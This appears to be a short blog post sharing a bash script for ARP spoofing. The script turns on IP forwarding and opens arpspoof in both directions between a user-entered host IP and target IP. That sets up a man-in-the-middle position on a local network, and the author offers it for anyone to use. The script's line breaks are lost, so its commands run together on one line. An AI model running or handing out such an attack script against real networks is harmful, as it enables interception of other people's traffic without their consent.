Its nothing special but it works and saves me about 30 seconds of time!!
I couldnt be bothered to keep typing in commands, and to be honest, i kept forgetting them!!
#!/bin/bashecho '1' > /proc/sys/net/ipv4/ip_forward#Ask for 2 IPSecho -e "Please Enter The HOST IP"read HOSTIPecho -e "Please Enter The TARGET IP"read TARGETIPecho "You entered: \"$HOSTIP\" \"$TARGETIP\""echo -e "Are you using wlan0 or eth0?"read NICecho "Preparing........."echo -e "\t\t Target: $TARGETIP \n"echo -e "\t\t Host: $HOSTIP \n\n"echo -e "Starting ArpSpoof"gnome-terminal -x arpspoof -i "$NIC" -t "$TARGETIP" -r "$HOSTIP"gnome-terminal --tab -x arpspoof -i "$NIC" -t "$HOSTIP" "$TARGETIP"
Feel free to use it!
No comments:
Post a Comment